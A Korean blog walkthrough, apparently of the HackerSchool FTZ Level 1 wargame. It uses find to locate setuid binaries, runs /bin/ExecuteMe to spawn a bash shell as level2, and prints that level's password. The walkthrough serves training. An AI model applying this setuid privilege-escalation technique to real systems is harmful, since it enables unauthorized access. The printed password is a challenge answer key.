[HackerSchool] 해커스쿨 FTZ: Level1

FTZ Level 문제들에서 최종 목표는 my-pass 명령어로

다음 레벨에 해당하는 비번을 찾아내는 것이다.

그리고 my-pass 명령어를 실행하려면

그 레벨에 해당하는 권한을 얻어야한다

---

 

level1 (비번도 level1) 으로 로그인하고 성공하면 아래와 같은 창이 뜬다

안떴다면 세팅이 잘 되어있는지 확인하자

Xshell 7 (Build 0113)
Copyright (c) 2020 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
[C:\~]$ 

Connecting to 192.168.176.128:22...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.

WARNING! The remote SSH server rejected X11 forwarding request.
[level1@ftz level1]$

 

현재 경로에 있는 파일들을 찾아보자.

$ ls -a

[level1@ftz level1]$ ls -a
.   .bash_history  .bash_profile  .cshrc  .epems  .gvimrc  .muttrc   public_html  .viminfo  .Xauthority
..  .bash_logout   .bashrc        .emacs  .gtkrc  hint     .profile  tmp          .vimrc    .Xdefaults

 

 

앞으로 ftz 모든 문제에서 cat hint를 통해 문제의 힌트를 얻을 수 있다.

근데 말만 힌트지 사실상 해당 레벨의 문제가 hint에 써있다고 봐도 무방하니 아끼지 말고 팍팍 쓰자!

$ cat hint

[level1@ftz level1]$ cat hint


level2 권한에 setuid가 걸린 파일을 찾는다.

 

 

하위 디렉토리(/) 에서 setuid(4000) 라는 권한(-perm)을 가지는 파일들을 찾자(find)

$ find / -perm 4000

[level1@ftz level1]$ find / -perm 4000
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
...

 

 

근데 파일이 겁나 많이 나온다...

우리는 다음 단계인 Level2 만 찾으면 되니 level2 라는 소유자 (-user)를 가진 파일만 찾아보자 

$ find / -user level2

[level1@ftz level1]$ find / -user level2
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
...
/bin/ExecuteMe
...
find: /home/trainer9: Permission denied

 

 

마찬가지로 많은 파일들이 나오긴 하지만.. 권한이 허용된 파일을 찾았다!

바로 해당 폴더로 이동

$ cd /bin

[level1@ftz level1]$ cd /bin
[level1@ftz bin]$ ls
arch        bash2  cpio   dnsdomainname  env        grep      kbd_mode  ls      mt             ping   rvi        sort   true           vi
ash         bsh    csh    doexec         ex         gtar      kill      mail    mv             ps     rview      stty   umount         view
ash.static  cat    cut    domainname     ExecuteMe  gunzip    level7    mkdir   my-pass        pwd    sed        su     uname          ypdomainname
autodig     chgrp  date   dumpkeys       false      gzip      link      mknod   netstat        red    setfont    sync   unicode_start  zcat
awk         chmod  dd     echo           fgrep      hostname  ln        mktemp  nice           rm     setserial  tar    unicode_stop
basename    chown  df     ed             gawk       igawk     loadkeys  more    nisdomainname  rmdir  sh         tcsh   unlink
bash        cp     dmesg  egrep          gettext    ipcalc    login     mount   pgawk          rpm    sleep      touch  usleep

 

 

해당하는 파일을 실행한다. 바로 !

$ ./ExecuteMe

[level1@ftz bin]$ ./ExecuteMe



		레벨2의 권한으로 당신이 원하는 명령어를
		한가지 실행시켜 드리겠습니다.
		(단, my-pass 와 chmod는 제외)

		어떤 명령을 실행시키겠습니까?
        
        [level2@ftz level2]$

 

권한은 얻었는데 정작 중요한 my-pass 는 안된단다..

그럼 my-pass 라는 명령어를 내릴 수 있게 명령을 내리자 (!)

$ bash

[level2@ftz level2]$ bash


[level2@ftz level2]$

 

이제 level2라는 유저로서 명령을 내릴 수 있다.

$ my-pass

[level2@ftz level2]$ my-pass

Level2 Password is "hacker or cracker".